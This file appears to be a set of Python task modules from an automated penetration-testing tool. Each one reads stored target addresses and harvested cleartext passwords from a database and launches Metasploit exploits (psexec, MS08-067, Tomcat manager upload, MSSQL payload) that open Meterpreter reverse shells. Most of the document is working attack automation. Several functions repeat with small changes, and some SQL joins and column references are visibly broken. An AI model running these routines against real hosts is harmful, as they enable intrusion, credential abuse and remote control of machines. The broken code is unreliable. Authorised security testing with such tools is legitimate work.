def run(params): sql = "select hd.ip_address, lc.username, lc.cleartext_password, from host_data hd join local_credentials lc on = lc.host_data_id where = %s and lc.cleartext_password != ''" cursor = params.db.cursor() cursor.execute(sql, (params.item_identifier, )) row = cursor.fetchone() #print "log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2]) #params.log("log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2])) cursor.close() setup = [ "use exploit/windows/smb/psexec", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[0]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "set smbuser {0}".format(row[1]), "set smbpass {0}".format(row[2]), "exploit" ] log = "" for l in exploit.runMsf(params, row[3], setup, "psexec"): log = log + l + "\r\n" params.log(l) cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[3], 4, log, )) cursor.close()
def run(params): sql = "select, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on = pd.host_data_id join vulnerabilities v on v.port_data_id = where = %s" cursor = params.db.cursor() cursor.execute(sql, params.item_identifier) row = cursor.fetchone() #print "exploit ms08-067 on host {0}".format(row[1]) params.log("exploit ms08-067 on host {0}".format(row[1])) cursor.close() setup = [ "use exploit/windows/smb/ms08_067_netapi", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "exploit" ] log = "" for l in exploit.runMsf(params, row[0], setup, "ms08_067"): log = log + l + "\r\n" cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 1, log)) cursor.close()
def run(params): sql = "select, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on = pd.host_data_id join vulnerabilities v on v.port_data_id = where = %s" cursor = params.db.cursor() cursor.execute(sql, params.item_identifier) row = cursor.fetchone() #print "exploit weak tomcat creds on host {0}".format(row[1]) params.log("exploit weak tomcat creds on host {0}".format(row[1])) cursor.close() creds = row[3].split(":") setup = [ "use exploit/multi/http/tomcat_mgr_upload", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set RPORT {0}".format(row[2]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "set TARGET 1", "set username {0}".format(creds[0]), "set password {0}".format(creds[1]), "exploit" ] log = "" for l in exploit.runMsf(params, row[0], setup, "tomcat_creds"): log = log + l + "\r\n" cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 3, log)) cursor.close()
def run(params): sql = "select hd.ip_address, lc.username, lc.cleartext_password, from host_data hd join local_credentials lc on = lc.host_data_id where = %s and lc.cleartext_password != ''" cursor = params.db.cursor() cursor.execute(sql, (params.item_identifier, )) row = cursor.fetchone() #print "log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2]) #params.log("log into host {0} with local creds {1}:{2}".format(row[0], row[1], row[2])) cursor.close() setup = [ "use exploit/windows/smb/psexec", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[0]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "set smbuser {0}".format(row[1]), "set smbpass {0}".format(row[2]), "exploit" ] log = "" for l in exploit.runMsf(params, row[3], setup, "psexec"): log = log + l + "\r\n" params.log(l) cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[3], 4, base64.b64encode(log), )) cursor.close()
def run(params): sql = "select, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on = pd.host_data_id join vulnerabilities v on v.port_data_id = where = %s" cursor = params.db.cursor() cursor.execute(sql, (params.item_identifier, )) row = cursor.fetchone() #print "exploit weak tomcat creds on host {0}".format(row[1]) #params.log("exploit weak tomcat creds on host {0}".format(row[1])) cursor.close() creds = row[3].split(":") setup = [ "use exploit/multi/http/tomcat_mgr_upload", "set TARGET 1", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set RPORT {0}".format(row[2]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format( params.getOpenPort()), "set username {0}".format(creds[0]), "set password {0}".format(creds[1]), "exploit" ] log = "" result = exploit.runMsf(params, row[0], setup, "tomcat_creds") for l in result[1]: log = log + l + "\r\n" params.log(l) if result[0] == True: cursor = params.db.cursor() cursor.execute( "update host_data set successful_info_gather = true where id = %s", (row[0], )) cursor.close() cursor = params.db.cursor() cursor.execute( "insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", ( row[0], 3, base64.b64encode(log), )) cursor.close()
def run(params): sql = """ select, hd.ip_address, dc.domain, dc.username, dc.cleartext_password from domain_credentials_map m join host_data hd on = m.host_data_id join domain_credentials dc on = m.domain_credentials_id where = %s""" cursor = params.db.cursor() cursor.execute(sql, params.item_identifier) row = cursor.fetchone() host_data_id = row[0] #print "log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4]) params.log("log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4])) cursor.close() setup = [ "use exploit/windows/smb/psexec", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "set smbdomain {0}".format(row[2]), "set smbuser {0}".format(row[3]), "set smbpass {0}".format(row[4]), "exploit" ] log = "" for l in exploit.runMsf(params, row[0], setup, "psexec"): log = log + l + "\r\n" #TODO: add way to verify whether the psexec run was successful, #if it was, mark it as so in the host_data table #exclude these from future runs cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (host_data_id, 4, log)) cursor.close()
def run(params): sql = "select, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on = pd.host_data_id join vulnerabilities v on v.port_data_id = where = %s" cursor = params.db.cursor() cursor.execute(sql, (params.item_identifier, )) row = cursor.fetchone() #print "exploit ms08-067 on host {0}".format(row[1]) #params.log("exploit ms08-067 on host {0}".format(row[1])) cursor.close() setup = [ "use exploit/windows/smb/ms08_067_netapi", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "exploit" ] log = "" result = exploit.runMsf(params, row[0], setup, "ms08_067") for l in result[1]: log = log + l + "\r\n" params.log(l) if result[0] == True: cursor = params.db.cursor() cursor.execute( "update host_data set successful_info_gather = true where id = %s", (row[0], )) cursor.close() cursor = params.db.cursor() cursor.execute( "insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", ( row[0], 1, base64.b64encode(log), )) cursor.close()
def run(params): sql = "select, hd.ip_address, pd.port_number, v.details from host_data hd join port_data pd on = pd.host_data_id join vulnerabilities v on v.port_data_id = where = %s" cursor = params.db.cursor() cursor.execute(sql, (params.item_identifier, )) row = cursor.fetchone() #print "exploit weak sql creds on host {0}".format(row[1]) #params.log("exploit weak sql creds on host {0}".format(row[1])) cursor.close() creds = row[3].split(":") setup = [ "use exploit/windows/mssql/mssql_payload", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "set username {0}".format(creds[0]), "set password {0}".format(creds[1]), "exploit" ] log = "" result = exploit.runMsf(params, row[0], setup, "sql_creds") for l in result[1]: log = log + l + "\r\n" params.log(l) if result[0] == True: cursor = params.db.cursor() cursor.execute("update host_data set successful_info_gather = 1 where id = %s", (row[0], )) cursor.close() cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (row[0], 2, log, )) cursor.close()
def run(params): sql = """ select, hd.ip_address, dc.domain, dc.username, dc.cleartext_password, from domain_credentials_map m join host_data hd on = m.host_data_id join domain_credentials dc on = m.domain_credentials_id where = %s and hd.successful_info_gather = 0 and dc.valid = 1""" cursor = params.db.cursor() cursor.execute(sql, params.item_identifier) row = cursor.fetchone() cursor.close() if row == None: #params.log("Authenticate to {0} using creds {1}\\{2}".format(row[1], row[2], row[3])) #params.log("") #params.log("This task was skipped to save time, as the task has already been run with a different set of creds") params.log("this task has already been successfully handled with a different set of creds") return waitForDifferentTask = False cursor2 = params.db.cursor() sql2 = """select hd.ip_address from task_list tl join domain_credentials_map m on = tl.item_identifier join host_data hd on = m.host_data_id where tl.task_descriptions_id = 17 and tl.in_progress = 1 and tl.completed = 0 and tl.footprint_id = %s and hd.ip_address = %s and != %s""" cursor2.execute(sql2, (params.footprint_id, row[1], params.task_id)) rows = cursor2.fetchall() for r in rows: waitForDifferentTask = True break cursor2.close() if waitForDifferentTask == True: time.sleep(5) params.log("another task is currently trying the same thing. will try again later") params.setReturnValue("run again") else: if row != None: host_data_id = row[0] #print "log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4]) #params.log("log into host {0} with domain creds {1}\{2}:{3}".format(row[1], row[2], row[3], row[4])) cursor.close() setup = [ "use exploit/windows/smb/psexec", "set PAYLOAD windows/meterpreter/reverse_tcp", "set RHOST {0}".format(row[1]), "set LHOST {0}".format(params.getLocalHost()), "set LPORT {0}".format(params.getOpenPort()), "set smbdomain {0}".format(row[2]), "set smbuser {0}".format(row[3]), "set smbpass {0}".format(row[4]), "exploit" ] log = "" result = exploit.runMsf(params, row[0], setup, "psexec") for l in result[1]: log = log + l + "\r\n" params.log(l) if result[0] == True: cursor = params.db.cursor() cursor.execute("update host_data set successful_info_gather = 1 where id = %s", (row[0])) cursor.close() else: if result[2] == False: cursor = params.db.cursor() cursor.execute("update domain_credentials_map set psexec_failed = 1 where id = %s", (row[5])) cursor.close() cursor = params.db.cursor() cursor.execute("insert into exploit_logs (host_data_id, vulnerability_description_id, log) values(%s, %s, %s)", (host_data_id, 4, log)) cursor.close()